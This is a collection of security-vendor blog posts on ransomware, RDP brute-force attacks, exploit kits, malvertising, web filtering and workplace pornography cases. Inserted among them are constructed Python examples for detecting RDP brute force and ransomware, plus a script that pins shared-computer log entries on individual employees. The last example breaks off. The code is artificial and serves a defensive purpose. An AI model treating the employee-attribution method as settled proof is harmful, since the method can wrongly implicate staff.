In Alabama, the proposed laws would see the Class A misdemeanour attract a fine of up to $6,000 and a jail term of up to a year, while the Class C felony would be punishable with a $30,000 fine and up to 10 years in jail.
Laws proposed in Alabama, South Carolina and North Dakota also require a mechanism to be introduced that would allow webpages and websites that have not been blocked by the filter to be easily reported. A call center or website would need to be set up for this purpose, and the sites would need to be added to the filter within a reasonable time frame. The failure to do so would result in a fine of $500 per instance.
The new bill would need to survive a vote, but before that takes place, Rep. Johnson first needs to keep his position. Yesterday, Republicans and Democrats called for Johnson’s resignation following allegations that he sexually assaulted a 17-year old girl at his Fern Creek church.
Kaspersky Lab has named ransomware as one of the key threats of 2017, and one that continues to plague businesses the world over. Ransomware attacks in 2017 are down year on year, but ransomware attacks on businesses are up.
Ransomware attacks in 2016 were bad, but this year there have been three major attacks that have gone global – WannaCry in May, NotPetya in June, and most recently, the Bad Rabbit attacks in October. Many of the ransomware attacks in 2017 have been far more sophisticated than in 2015 and 2016, while attackers are now using a wider variety of tactics to install the malicious code.
At the start of 2016, ransomware was primarily being installed using exploit kits, before attackers switched to spam email as the main method of delivery. Spam email remains one of the most common ways for ransomware to be installed, although each of the above three attacks used exploits for unpatched vulnerabilities.
Those exploits, all of which had been developed and used by the NSA, had been leaked online by the hacking group Shadow Brokers. While not as severe as WannaCry, NotPetya and Bad Rabbit, the AES-NI and Uiwix ransomware variants also used exploits. Threat actors are also using remote desktop protocol to gain access to systems to install ransomware, while the use of exploit kits is once again on the rise.
There has been a noticeable change in targets since 2015 when ransomware started to be favored by cybercriminals. Consumers were the main targets, although cybercriminals soon realized there was more to be made from attacking businesses. In 2016, 22.6% of ransomware attacks were on business users. The Kaspersky Lab report shows that ransomware attacks on businesses are becoming far more common, accounting for 26.2% of all attacks in 2017.
Out of the businesses that experienced a ransomware attack in 2017, 65% said they lost access to a significant amount of data, and in some cases, all of their data. Some businesses have prepared for the worst and have developed ransomware response plans and now have multiple copies of backups, with at least one copy on an unnetworked device. In the event of an attack, data can be recovered.
Others have not been so fortunate and have been left with no alternative other than to pay the ransom demand. As we saw with NotPetya, and many other ransomware and pseudo-ransomware variants, it is not always possible to recover data. The Kaspersky Lab report shows that one in six businesses that paid the ransom demand were unable to recover their data, creating massive business disruption and also potentially privacy and compliance fines. Keys to unlock the encryption were not provided or simply did not work.
There is some good news in the report. Ransomware attacks in 2017 affected 950,000 unique users, which is a considerable reduction from last year when 1.5 million users suffered a ransomware attack. This has been attributed not to a reduction in attacks, but better detection.
Kaspersky reports that the explosion in ransomware families in 2016 did not continue at the same level in 2017. Last year, 62 new families of ransomware were discovered. While there is still a month left of the year, to date, the number of new ransomware families in 2017 has fallen to 38.
While this appears to be good news, it is not an indication that the threat from ransomware is reducing. Kaspersky Lab notes that while the creation of new ransomware families halved in 2017, in 2016 there were 54,000 modifications made to existing ransomware variants, but this year there have been 96,000 modifications detected – almost double the number of modifications last year. Rather than develop new ransomware families, cybercriminals are tweaking existing ransomware variants.
Kaspersky Lab, McAfee, and a host of security experts predict ransomware attacks will continue to plague businesses in 2018. As long as the attacks remain profitable they will continue, although Kaspersky Lab notes that 2018 is likely to see efforts switch to cryptocurrency miners, which can prove more profitable than ransomware in the long run. Even so, ransomware attacks are likely to continue for the foreseeable future.
To prevent the attacks, businesses need to implement a host of defenses to block and detect ransomware. Anti-spam software can be deployed to prevent email-based attacks, web filters can be used to block access to websites hosting exploit kits and prevent drive-by downloads, and endpoint protection systems and network monitoring can detect changes made by ransomware and alert businesses to ransomware attacks in progress. Along with good backup policies and end user training, the threat from ransomware can be reduced to an acceptable level and the majority of attacks can be blocked.
A malware threat called LockCrypt ransomware is being used in widespread attacks on businesses in the United States, United Kingdom, and South Africa. While ransomware is commonly spread via spam email, this campaign spreads the file-encrypting malware via remote desktop protocol brute force attacks.
The LockCrypt ransomware attacks were first detected in June this year, but over the past few months the number of attacks has increased significantly, with October seeing the highest number of attacks so far this year.
LockCrypt ransomware is a relatively new malware variant, having first been seen in June 2017. Once infected, users will be unable to access their files. This ransomware variant uses RSA-2048 and AES-256 cryptography, which makes it virtually impossible to recover files without paying the ransom demand if a viable backup does not exist. To make recovery more difficult, LockCrypt ransomware also deletes Windows Shadow Volume copies. Encrypted files are given the .lock extension.
The ransom payment for this campaign is considerable – typically between 0.5 and 1 Bitcoin per encrypted server. That’s between $3,963 and $7,925 per compromised server; however, since the same login credentials are often used for RDP access on multiple servers, once one password is correctly guessed, it can be used to access multiple servers and deploy LockCrypt ransomware. One of the Bitcoin addresses used by the attackers shows one company paid a ransom of $19,000 to recover files on three of its servers.
Once access to a server is gained, ransomware is deployed; however, the attackers are manually interacting with compromised servers. AlienVault security researcher Chris Doman reported that for one company, in addition to deploying ransomware, the attackers “manually killed business critical processes for maximum damage.” All non-core processes on an infected server are killed.
The attacks do not appear to be targeted, instead they are randomly conducted on business servers. Businesses that are most likely to have ransomware installed are those that have failed to use complex passwords for RDP access. While it may be tempting to set an easy-to-remember password, this plays into the hands of attackers.
Other security controls such as two-factor authentication can reduce the risk from this type of attack, as can rate limiting to restrict the number of failed attempts a user can make before their IP address is temporarily – or permanently – blocked.
An additional control that system administrators can apply is to white-list certain IP addresses to restrict RDP access to authorized individuals. If that is not practical, disallowing RDP connections over the Internet from abroad can help to prevent these attacks.
While implementing controls to prevent RDP brute force attacks is vital, most ransomware variants are spread via spam email, and to a lesser extent via exploit kits and drive-by downloads. Comprehensive security defenses must therefore be deployed to reduce the risk of ransomware attacks.
These should include an advanced spam filtering solution to prevent malicious emails from being delivered, web filters to block malicious websites and drive-by downloads, end user training to raise awareness of the threat from ransomware and other forms of malware, and network monitoring technology to identify unusual server and endpoint activity.
Network activity monitoring will not prevent ransomware attacks, but it will help IT teams respond quickly and halt the spread of ransomware to other vulnerable servers and end points.
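The RDP brute-force controls described above (rate limiting, IP allow-listing, monitoring for unusual activity) can be backed by simple detection over the Windows Security log. The following is an added example, not code from the article or from AlienVault: it parses a few constructed Event ID 4625 (failed logon) records, keeps a sliding window of failures per source address, and reports the sources that exceed a threshold. The record format and thresholds are assumptions for the example.

```python
"""Flag RDP brute-force activity from (constructed) Windows 4625 failed-logon records.

Added example, not from the article. Logon type 10 is RemoteInteractive (RDP);
type 3 (network) is also counted because NLA-protected RDP logs failures that way.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Fields: timestamp, event id,
# logon type, account name, source IP. Real 4625 events carry the same data
# in the event XML (TargetUserName, LogonType, IpAddress).
SAMPLE_EVENTS = [
    "2017-10-12T02:14:01 4625 10 administrator 203.0.113.5",
    "2017-10-12T02:14:03 4625 10 administrator 203.0.113.5",
    "2017-10-12T02:14:05 4625 10 admin 203.0.113.5",
    "2017-10-12T02:14:08 4625 3 backup 203.0.113.5",
    "2017-10-12T02:14:10 4625 3 sqlsvc 203.0.113.5",
    "2017-10-12T02:14:12 4625 10 administrator 203.0.113.5",
    "2017-10-12T02:14:15 4625 10 Administrator 203.0.113.5",
    "2017-10-12T08:01:30 4625 10 jsmith 198.51.100.20",   # one typo, then success
    "2017-10-12T08:02:04 4624 10 jsmith 198.51.100.20",
    "2017-10-12T09:00:00 4625 10 ops 192.0.2.9",          # slow: one every 30 min
    "2017-10-12T09:30:00 4625 10 ops 192.0.2.9",
    "2017-10-12T10:00:00 4625 10 ops 192.0.2.9",
    "2017-10-12T10:30:00 4625 10 ops 192.0.2.9",
    "2017-10-12T11:00:00 4625 10 ops 192.0.2.9",
]


def parse_event(line):
    """Split one constructed record into a dict with typed fields."""
    ts, event_id, logon_type, account, src = line.split()
    return {
        "time": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "logon_type": int(logon_type),
        # Windows account names are case-insensitive; normalise for counting.
        "account": account.lower(),
        "src": src,
    }


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Return {source_ip: (peak_failures_in_window, distinct_accounts_tried)}
    for every source that reaches `threshold` failed RDP logons within `window`.

    A sliding window is used so that a slow trickle of failures spread over
    hours (a user mistyping now and then) does not trigger, while a burst does.
    """
    recent = defaultdict(deque)    # src -> timestamps still inside the window
    accounts = defaultdict(set)    # src -> account names attempted
    flagged = {}
    for ev in (parse_event(l) for l in lines):
        if ev["event_id"] != 4625 or ev["logon_type"] not in (3, 10):
            continue
        q = recent[ev["src"]]
        q.append(ev["time"])
        accounts[ev["src"]].add(ev["account"])
        while q and ev["time"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peak = max(flagged.get(ev["src"], (0, 0))[0], len(q))
            flagged[ev["src"]] = (peak, len(accounts[ev["src"]]))
    return flagged


def sources_to_block(flagged, allowlist=frozenset()):
    """Sorted list of flagged sources, minus any administrator allow-list entries
    (the IP allow-listing control mentioned in the article)."""
    return sorted(src for src in flagged if src not in allowlist)


if __name__ == "__main__":
    hits = detect_rdp_bruteforce(SAMPLE_EVENTS)
    for src, (count, n_accounts) in hits.items():
        print(f"{src}: {count} failures, {n_accounts} accounts tried")
    print("block:", sources_to_block(hits))
```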
The Magnitude exploit kit is being used to deliver a new malware variant – Magniber ransomware. While the Magnitude EK has been used in attacks throughout the Asia Pacific region, the latest attacks are solely taking place in South Korea.
Ransomware and malware attacks in Europe and the Americas are primarily conducted via spam email. Exploit kits have fallen out of favor with cybercriminals over the past year. However, that is not the case in the Asia Pacific region, where exploit kit attacks are still common.
An exploit kit is a website toolkit that scans visitors’ browsers for exploitable vulnerabilities. When a vulnerability is identified, it is exploited to download malware onto the user’s system. The download occurs silently and in the case of a ransomware attack, the user is only likely to discover the attack when their files have been encrypted.
Magniber ransomware takes its name from the Magnitude EK and Cerber ransomware, the ransomware variant that it has replaced. At present, Magniber ransomware is solely targeting users in South Korea. If the operating system is not in Korean, the ransomware will not execute. While it is not unusual for ransomware campaigns to involve some targeting, it is rare for attacks to be targeted on a specific country.
Up until recently, the Magnitude exploit kit was being used to download Cerber ransomware. FireEye reports that those attacks were concentrated in the Asia Pacific region. 53% of attacks occurred in South Korea, followed by the USA (12%), Hong Kong (10%), Taiwan (10%), Japan (9%), and Malaysia (5%). Small numbers of attacks also occurred in Singapore and the Philippines. At the end of September, Magnitude EK activity fell to zero, but on October 15, the payload was updated and attacks were solely conducted in South Korea.
To avoid analysis, Magniber ransomware checks whether it is running in a virtual environment. A check is also performed to identify the system language. If the system language is Korean, data is encrypted with AES128 and encrypted files are given the .ihsdj extension. After encryption, the ransomware deletes itself. If the system language is not Korean, the ransomware exits.
At present, the Magnitude Exploit Kit has been loaded with a single exploit for CVE-2016-0189 – a memory corruption vulnerability in Internet Explorer. A patch for the vulnerability was released last year. FireEye believes the ransomware is still under development and its capabilities will be enhanced and fine-tuned.
To prevent attacks, it is important to ensure systems are fully patched. Businesses should make sure all network nodes are updated and are fully patched. A web filtering solution should also be used as an additional protection against this and other exploit kit attacks.
The EU’s proposed Internet copyright filter has not proven popular with digital rights groups. The Internet copyright filter provision, detailed in Article 13 of the Digital Single Market proposals, would require the Internet to be policed to prevent the online publication of copyrighted content.
At present, if an individual decides to share content online and that material is protected by copyright, the holder of the copyright can submit a request to have the material taken down. The process can take some time before the material is removed, during which time the information can be viewed and potentially downloaded.
The proposed Internet copyright filter would improve protections for copyright holders. Online service providers such as Facebook, Twitter, WordPress, YouTube, and Dropbox would be required to constantly scan uploaded content to check the material is not protected by copyright. If it is, the content would need to be removed immediately.
The Internet copyright filter would certainly go some way toward protecting the rights of copyright holders and would make it harder for music, movies, TV shows, and other video content to be uploaded and viewed by the public. Unsurprisingly, the proposed measure has attracted considerable support from the entertainment industry.
However, there has been considerable opposition to the proposed Internet copyright filter by digital rights groups such as the Electronic Frontier Foundation, Human Rights Watch, Reporters Without Borders, Open Rights Group, European Digital Rights and the Civil Liberties Union for Europe. In total, 56 organizations have added their name to an open letter to EU policymakers calling for Article 13 to be dropped.
Those organizations believe that while there are benefits to Article 13, the Internet copyright filter would be impossible to implement without also violating the freedom of expression detailed in Article 11 of the Charter of Fundamental Rights, as well as imposing excessive restrictions on citizens’ fundamental rights.
If passed, Internet companies would be forced to take down content to avoid possible legal liability, and that would undoubtedly see them erring on the side of caution and applying excessive filtering controls. Legitimate content would be deleted and Internet filtering controls would limit freedom to impart and receive information. Further, it would be difficult in practice to differentiate illegal uploads of content that violate copyright laws from legitimate uses of content.
Whether the letter will result in Article 13 being dropped remains to be seen, but if not, there are likely to be further challenges. As is mentioned in the letter, previous attempts to introduce new laws that conflict with the Charter of Fundamental Rights have been rejected by the Court of Justice. If those precedents are followed, Article 13 would likely be rendered invalid.
A Social Community Partnership employee fired for viewing pornography at work took legal action against her employer for unfair dismissal. However, Ireland’s Workplace Relations Commission (WRC) has upheld the Partnership’s decision to fire the employee, confirming the sanction was appropriate.
In May 2016, the employee was discovered to have viewed pornography on her work computer and was promptly fired for gross misconduct. While the employee denied viewing pornography at work, a review of access logs on her computer revealed pornographic websites had been accessed on seven occasions between September and November 2015.
The material accessed included depictions of rape and the abduction of girls. While viewing pornography at work is unacceptable in any office, the nature of the material that was accessed made this an egregious violation of the Partnership’s acceptable Internet usage policy, especially considering the Social Community Partnership works to support children and families.
Lack of Individual Logins Makes it Difficult to Attribute Inappropriate Internet Access to Individual Employees
The case was not clear cut, as the computers in the reception area where she worked did not require secure logins for each employee. The employee also denied that she had viewed pornography and claimed two other workers used the same computers. She also said that other employees could have used the computers when she was not at her desk.
To determine that the employee was the person responsible for violating the company’s acceptable Internet use policy, the Partnership had to compare Internet logs against the work schedule. Multiple employees were found to have been working on four of the seven occasions, but the employee was the only person scheduled to work in the reception area on three of the occasions when pornography was accessed.
The employee suggested the sites could have been popups, although the claim was rejected by her employer. To determine whether access was due to a malware infection, an external computer expert was called in to conduct a scan of the computer. The scan confirmed no malware was present that could have redirected the browser to pornographic websites.
After hearing the unfair dismissal case and the evidence against the employee, the WRC ruled that ‘on the balance of probability,’ the employee was the person responsible for accessing the material and that, under the circumstances, the decision to fire the employee was correct.
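The attribution method the Partnership had to fall back on, matching proxy log timestamps against the work roster because the shared reception computer had no individual logins, can be expressed as a small script. This is an added example with constructed data, not the Partnership's logs or method; the log and roster formats, workstation names and employee labels are assumptions.

```python
"""Attribute access-log entries on a shared workstation to employees via a shift roster.

Added example, not from the article. With no per-user logins, an event can only
be attributed when exactly one person was rostered to that workstation at that
time; events with several candidates (or none) stay ambiguous, as the WRC case
illustrates (seven events, three attributable, four with multiple staff on shift).
"""
from collections import Counter
from datetime import datetime

# Constructed proxy/access-log lines: timestamp, workstation, site category.
ACCESS_LOG = [
    "2015-09-14T10:12:00 RECEPTION-1 adult",
    "2015-09-21T11:40:00 RECEPTION-1 adult",
    "2015-09-21T11:45:00 RECEPTION-1 news",     # not in scope, ignored
    "2015-10-05T15:05:00 RECEPTION-1 adult",
    "2015-10-19T14:30:00 RECEPTION-1 adult",
    "2015-10-19T14:31:00 OFFICE-3 adult",       # different workstation
    "2015-11-02T09:45:00 RECEPTION-1 adult",
    "2015-11-09T12:10:00 RECEPTION-1 adult",
    "2015-11-16T16:20:00 RECEPTION-1 adult",
]

# Constructed roster: (employee, workstation, shift start, shift end).
ROSTER = [
    ("employee_a", "RECEPTION-1", "2015-09-14T09:00:00", "2015-09-14T13:00:00"),
    ("employee_b", "RECEPTION-1", "2015-09-14T09:00:00", "2015-09-14T13:00:00"),
    ("employee_a", "RECEPTION-1", "2015-09-21T09:00:00", "2015-09-21T17:00:00"),
    ("employee_a", "RECEPTION-1", "2015-10-05T09:00:00", "2015-10-05T17:00:00"),
    ("employee_c", "RECEPTION-1", "2015-10-05T09:00:00", "2015-10-05T17:00:00"),
    ("employee_a", "RECEPTION-1", "2015-10-19T13:00:00", "2015-10-19T17:00:00"),
    ("employee_d", "OFFICE-3",    "2015-10-19T09:00:00", "2015-10-19T17:00:00"),
    ("employee_a", "RECEPTION-1", "2015-11-02T09:00:00", "2015-11-02T17:00:00"),
    ("employee_b", "RECEPTION-1", "2015-11-02T09:00:00", "2015-11-02T17:00:00"),
    ("employee_a", "RECEPTION-1", "2015-11-09T09:00:00", "2015-11-09T13:00:00"),
    ("employee_a", "RECEPTION-1", "2015-11-16T09:00:00", "2015-11-16T17:00:00"),
    ("employee_c", "RECEPTION-1", "2015-11-16T09:00:00", "2015-11-16T17:00:00"),
]


def on_shift(roster, workstation, when):
    """Set of employees rostered to `workstation` at datetime `when`
    (shift start inclusive, shift end exclusive)."""
    return {
        emp for emp, ws, start, end in roster
        if ws == workstation
        and datetime.fromisoformat(start) <= when < datetime.fromisoformat(end)
    }


def attribute(log_lines, roster, category="adult"):
    """Return (attributed, ambiguous).

    attributed: Counter of employee -> number of events uniquely attributable.
    ambiguous:  list of (timestamp, sorted candidate list) for events with
                zero or several people on shift; these cannot be pinned on anyone.
    """
    attributed = Counter()
    ambiguous = []
    for line in log_lines:
        ts, workstation, cat = line.split()
        if cat != category:
            continue
        when = datetime.fromisoformat(ts)
        candidates = on_shift(roster, workstation, when)
        if len(candidates) == 1:
            attributed[next(iter(candidates))] += 1
        else:
            ambiguous.append((ts, sorted(candidates)))
    return attributed, ambiguous


if __name__ == "__main__":
    who, unclear = attribute(ACCESS_LOG, ROSTER)
    print("attributed:", dict(who))
    for ts, cands in unclear:
        print(f"ambiguous {ts}: {cands or 'nobody rostered'}")
```

The attributable count per person, not the total number of events, is what an employer can put to a tribunal; the ambiguous list shows why per-user logins remove this problem entirely.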
Two Thirds of Men and One Third of Women Admit to Viewing Pornography at Work
Even though viewing pornography at work is prohibited in many organizations, employees ignore company rules and access obscene material on their work computers. The actions often result in instant dismissal when they are discovered, although many employees believe they won’t be caught or do not realize Internet logs are maintained. Many choose to anonymize their Internet activity by connecting to the Internet via VPNs and other anonymizing services.
The scale of the problem has been identified by several surveys and studies. In one notable study, conducted by Proven Men Ministries in 2014, 63% of men and 36% of women admitted having accessed pornography at work on at least one occasion. Other studies in the United States and the UK have also confirmed viewing pornography at work is commonplace.
The viewing of pornography at work can cause many problems for employers. In this case, the Social Community Partnership could have lost essential government funding. Even though that didn’t happen, there has been considerable negative publicity and the expense of fighting an unfair dismissal claim.
When employees view pornography at work it can easily lead to the creation of a hostile working environment, lawsuits could be filed by other employees who have been made to feel uncomfortable by the actions of others, and when illegal pornographic material is accessed at work – child pornography for example – the consequences for employers can be severe.
How Can Businesses Prevent Employees Viewing Pornography at Work?
Acceptable Internet usage policies can be used to ensure employees who breach the rules can be fired, but they do not prevent employees viewing pornography at work. Cases such as this show just how important it is to implement technology to prevent employees from accessing inappropriate website content – not just pornography, but also other content that should not be accessed in the workplace.
The expense and problems experienced by the Social Community Partnership could have easily been avoided if a web filter had been used. A web filter is a simple method of enforcing acceptable Internet usage policies and preventing pornography and other unacceptable content from being accessed by employees. A web filter can also block the use of anonymizers such as VPNs.
Further, a web filter is easy to implement, inexpensive, and can help organizations prevent considerable productivity losses, while reducing legal liability.
To find out more about the benefits of web filtering, and how you can stop employees viewing pornography at work, contact the TitanHQ team today and ask about WebTitan.
A massive Pornhub malvertising campaign has been detected that potentially resulted in millions of malware infections in the United States, Canada, UK, Australia and beyond.
Malvertising is the term given to malicious adverts that dupe website visitors into visiting websites where malware is downloaded or to sites that are used to phish for login credentials. These malverts often appear on legitimate websites, adding to their legitimacy. The malicious sites that users are directed to can download any type of malware – keyloggers, ransomware, spyware or adware.
The Pornhub malvertising campaign was used to spread click fraud malware. The hacking group behind the campaign – KovCoreG – used the Kovter Trojan. The malware has persistence and will survive a reboot.
Pornhub is one of the most popular adult websites, attracting millions of visitors. The website uses a third-party ad network called Traffic Junky. The attackers managed to sneak their malicious adverts past the controls the ad network has in place against malvertising.
The attackers detected the browser being used and redirected users to a website tailored to their browser. The Pornhub malvertising campaign worked on users of Chrome, Internet Explorer/Edge and Firefox. The webpages had been expertly crafted to exactly match the colors and fonts of Google, Firefox, and Microsoft, and included the relevant logos and branding. The malicious webpages indicated a critical security update was required to secure the user’s browser. Clicking to download the update, and running that update, would result in infection.
The Pornhub malvertising campaign was detected by Proofpoint, which notified the ad network and Pornhub. Both acted quickly to remediate the threat, although not before many users had been infected with malware.
A Web Filtering Solution Can Block Malvertising Attacks
Implementing a web filtering solution in the workplace is not just about preventing your employees from wasting time on Facebook. A web filter is an important part of any layered cybersecurity defense strategy. The latest Pornhub malvertising campaign is a good example of how controlling the websites your employees can access can prevent malware infections.
Unless you work in the adult entertainment industry, employees should be prevented from accessing pornography at work. Most organizations include pornography in their acceptable usage policies. However, unless a filtering solution is implemented to block access, some employees are likely to break the rules. You could have a policy in place that states accessing pornography at work will result in instant dismissal. However, if anyone breaks the rules, it is not just their job that is on the line. Your network could be infected with malware.
Of course, cybercriminals do not just use adult websites for malicious adverts. Malvertising can appear on any website that includes ad blocks from third party advertisers. Since these ad blocks are an important source of revenue, many popular websites use them – websites that are likely to feature heavily in your Internet access logs. The New York Times website for example, or the BBC and MSN.
This Pornhub malvertising campaign required a manual download, although oftentimes users are directed to sites where malware is downloaded automatically using exploit kits. If you are fully patched, you are likely to avoid an infection, but it is easy to miss a patch. The massive Equifax data breach showed how easy it is for a patch to be missed, as did the Wannacry ransomware attacks.
Considering the cost of resolving a malware infection, phishing attack, or ransomware installation, a web filtering solution is likely to pay for itself. Add to that the increase in productivity from blocking access to certain categories of websites and the improvements to your profits can be considerable.
If you are not yet using a web filter, or are unhappy with the cost of your current solution, give TitanHQ a call today and find out more about the savings you could be making.
The cost of cybercrime is 23% higher than last year, according to a new study conducted by the Ponemon Institute on behalf of Accenture. The average annual cost of cybercrime is now $11.7 million per organization, having increased from $9.5 million last year.
The Ponemon Institute conducted the 2017 Cost of Cybercrime study on 2,182 security and IT professionals at 254 organizations. Respondents were asked about the number of security breaches they experienced in the past 12 months, the severity of those incidents, and the cost of mitigation.
The average number of security breaches experienced by each organization was 130 per year, which is more than twice the number of incidents that were being experienced 5 years ago and 27.4% more than this time last year.
The costs of cybercrime were split into four areas: disruption to business processes, data loss, loss of revenue, and damage to equipment. Respondents were asked to rate each based on its cost. While the losses from disruption to the business were not insignificant, they were the least costly. The biggest cost was information loss.
The costliest security incidents to resolve were malware attacks, which cost an average of $2.4 million to resolve, although the attacks were considerably more expensive to resolve in the United States, where the average loss was $3.82 million per incident. In second place were web-based attacks, costing an average of $2 million globally and $3.4 million in the United States.
However, in terms of the amount of disruption caused, insider incidents topped the list, taking an average of 50 days to mitigate. Ransomware attacks took an average of 23 days to resolve.
The cost of cybercrime report indicates that organizations in the financial services sector have the highest annual costs, spending an average of $18.28 million per organization. In second place was the energy sector, with an average annual cost of $17.20 million.
Organizations in the United States had the biggest annual security breach resolution costs, spending an average of $21 million each per year. Bottom of the list was Australia with average annual costs of $5 million. Organizations in the United Kingdom were spending an average of $8.7 million per year.
As we saw with the NotPetya attacks, the cost of a cyberattack can be considerably higher. Both Maersk and FedEx reported their losses from the attacks could well rise to $300 million.
The most valuable security tools were seen as threat intelligence solutions, which gather data from cyberattacks around the world and allow businesses to prioritize threats. These solutions saved businesses an average of $2.8 million per year.
Email may be the primary vector used in phishing attacks, but the second quarter of 2017 has seen a massive increase in malvertising phishing attacks.
Malvertising is the term given to malicious adverts, which are often displayed on high-traffic websites via third party advertising networks. These adverts are used to direct web visitors to malicious websites, oftentimes sites containing exploit kits that probe for vulnerabilities and silently download ransomware and other malware.
These malware attacks increased between 2015 and 2016, with the total number of malvertising attacks rising by 136%. Demonstrating how quickly the threat landscape changes, between Q1 and Q2, 2017 there was a noticeable decline in malicious advert-related exploit kit and malware attacks. Exploit kit redirects fell by 24% and malware-related adverts fell by almost 43%, according to a recent study released by RiskIQ.
However, the study shows there was a massive increase in malvertising phishing attacks, with cybercriminals changing their tactics. Phishing-related ads increased by 131% in Q2, 2017, and between 2015 and 2016, malvertising phishing attacks increased by a staggering 1,978%.
The websites that these adverts direct users to often promise a free gift in exchange for taking part in a survey. Genuine market research firms tend not to offer large incentives for taking part in surveys, or when they do offer an incentive, participants are entered into a draw where they stand a chance of winning a prize. When gifts are offered to all participants, it is a warning sign that all may not be as it seems. That said, many people still fall for the scams.
The aim of the surveys is to obtain sensitive information such as bank account information, Social Security numbers, usernames, passwords and personal information. The information can be used for a wide range of nefarious purposes. It is not only personal information that is sought. Cybercriminals are keen to gain access to corporate email accounts for the data they contain and to use them to send phishing emails.
When phishing attacks occur through corporate email accounts it can seriously tarnish a company’s reputation and may result in litigation if insufficient controls have been implemented to prevent such attacks from occurring.
Businesses can protect against malicious adverts and websites by implementing a web filter. A web filter can be configured to block third party adverts as well as the malicious websites that users are directed to, thus minimizing the risk of web-based malware and phishing attacks.
Many businesses are now choosing to filter the website content that their employees access purely for security reasons, although there are many other benefits to be gained from content filtering. Web filters can help employers curb cyberslacking, control bandwidth usage, and reduce legal liability.
With the cost of DNS-based content filtering low and potentially high losses from the failure to control Internet access, it is no surprise that so many businesses are now choosing to regulate what employees can do online at work.
To find out more about the full range of benefits of web filtering and to take advantage of a free trial of WebTitan, the leading web filtering solution for businesses, contact the TitanHQ today.
Why should businesses invest heavily in technology to detect ransomware attacks when a ransom payment may only be between $500 and $1,000? While that is what cybercriminals are charging as a ransom, the cost of a ransomware attack is far higher than any ransom payment. In fact, the ransom is often one of the lowest costs of a ransomware attack that businesses must cover.
The ransom payment may seem relatively small, although the latest ransomware variants are capable of spreading laterally, infecting multiple computers and servers and encrypting network shares. The ransom payment is then multiplied by the number of devices that have been infected.
The Cost of a Ransomware Attack Can Run to Millions of Dollars
When businesses suffer ransomware attacks, the attackers often set their ransoms based on the perceived ability of the organization to pay. In 2016, Hollywood Presbyterian Medical Center was forced to pay a ransom of $19,000 to regain access to its systems. When the San Francisco Muni was infected, hackers demanded $50,000 for the keys to unlock its payment system. In June 2017, South Korean web host Nayana agreed to pay $1 million for the keys to unlock the encryption of its 53 Linux servers and 3,400 customer websites.
These ransom payments are high, but the ransom is only one cost of a ransomware attack. The biggest cost of a ransomware attack is often the disruption to business services while files are taken out of action. Systems can be taken out of action for several days, bringing revenue-generating activities to an abrupt stop. One Providence law firm experienced downtime of three months following a ransomware attack, even though the $25,000 ransom was paid. Lawyers were stopped from working, causing a loss in billings of an estimated $700,000.
In heavily regulated industries, notifications must be sent to all individuals whose information has been encrypted, and credit monitoring and identity theft services often need to be provided. When hundreds of thousands of users’ data is encrypted, the cost of printing and mailing notifications and paying for credit monitoring services is substantial.
Once an attack has been resolved, networks need to be analyzed to determine whether any other malware has been installed or backdoors created. Cybersecurity experts usually need to be brought in to conduct forensic analyses. Then ransomware defenses need to be improved and new security systems purchased. The total cost of a ransomware attack can extend to hundreds of thousands or millions of dollars.
Ransomware is Here to Stay
As long as ransomware attacks are profitable, the threat will not go away. The use of ransomware-as-a-service allows ransomware developers to concentrate on creating even more sophisticated ransomware variants and stay one step ahead of security researchers and antivirus companies.
Anonymous payment methods make it hard for law enforcement to discover the identities of ransomware developers, and since those individuals are usually based overseas, even if they are identified, bringing them to justice is problematic.
Ransomware developers are constantly changing tactics and are developing new methods of attack. The coming months and years are likely to see major changes to how ransomware is used, and the systems that are attacked.
Ransomware attacks mostly target Windows systems, although new variants have already been developed to encrypt Mac and Linux files. Security experts predict there will also be an increase in ransomware variants targeting Macs as Apple’s market share increases, while website attacks are becoming more common. When a website is attacked, all site files, pages, and images are encrypted to prevent access. For an e-commerce business, the attacks can be devastating.
Ransomware attacks on mobile devices are now commonplace, with screen-lockers and file-encryptors used. Screen locking ransomware prevents users from accessing any apps or functions rendering the device unusable. File encrypting variants encrypt all data stored on the device. These ransomware variants are most commonly packaged with apps sold in unofficial app stores. Risk can be substantially reduced by only downloading files from official app stores and ensuring all apps are kept up to date.
Given the increase in attacks and the massive increase in new ransomware variants, businesses must improve their defenses, block the common attack vectors, backup all data, and constantly monitor for indicators of compromise.
Tips for Preventing a Ransomware Attack
- Ensure users only have access to data and network drives necessary for them to perform their jobs.
- Backup devices should be disconnected when backups have been performed.
- Keep operating systems, software applications, and plugins up to date and fully patched.
- Block access to websites known to host exploit kits using a web filter such as WebTitan.
- Implement a spam filtering solution to prevent malicious emails from reaching inboxes.
- Provide regular, ongoing training to all staff on the risks of ransomware and phishing.
- Segment your network and restrict administrator rights.
To ensure a swift recovery from a ransomware attack, make sure you:
- Create multiple backups of all files, websites, and systems.
- Keep three copies of your data on two different media, and store one copy offsite.
- Develop a ransomware response plan that can be implemented immediately when an attack is suspected.
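The list above ends with constant monitoring for indicators of compromise, but does not say what such an indicator looks like on a file server. The following is an added example, not code from the article or from any TitanHQ product. It runs three generic ransomware indicators over a constructed audit log: a burst of files renamed or created with the same unfamiliar extension by one user inside a short window (mass encryption leaves renamed files behind), a dropped text or HTML file whose name advertises decryption, and any write to a decoy "canary" file that no legitimate workflow touches, which also catches variants that keep the original file names. The log format, thresholds, canary path and user names are all assumptions made for the example; events are assumed to arrive in time order.

```python
"""Ransomware indicators of compromise over constructed file-server audit events.
Added example: not from the article or any vendor product. Assumes one record per
line, "<iso-time> <host> <user> <op> <path>", sorted by time; RENAME logs the new name.
"""
import os
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Tuple

WINDOW_SECONDS = 60          # sliding window for the burst heuristic (assumption)
BURST_THRESHOLD = 5          # same new extension this many times in the window (assumption)
KNOWN_EXTENSIONS = {".docx", ".xlsx", ".pdf", ".txt", ".jpg", ".bak"}
CANARY_PATHS = {"/srv/finance/.canary/do_not_open.docx"}   # constructed decoy file
RANSOM_NOTE = re.compile(r"(decrypt|restore|recover)", re.IGNORECASE)
NOTE_EXTENSIONS = {".txt", ".html", ".hta"}

# Constructed sample log: bob works normally, alice's account mass-renames files to
# .locked, drops a ransom note and touches the canary; a backup job writes a .bak.
SAMPLE_LOG = """\
2017-09-07T10:15:01 fs01 bob WRITE /srv/finance/q3_forecast.xlsx
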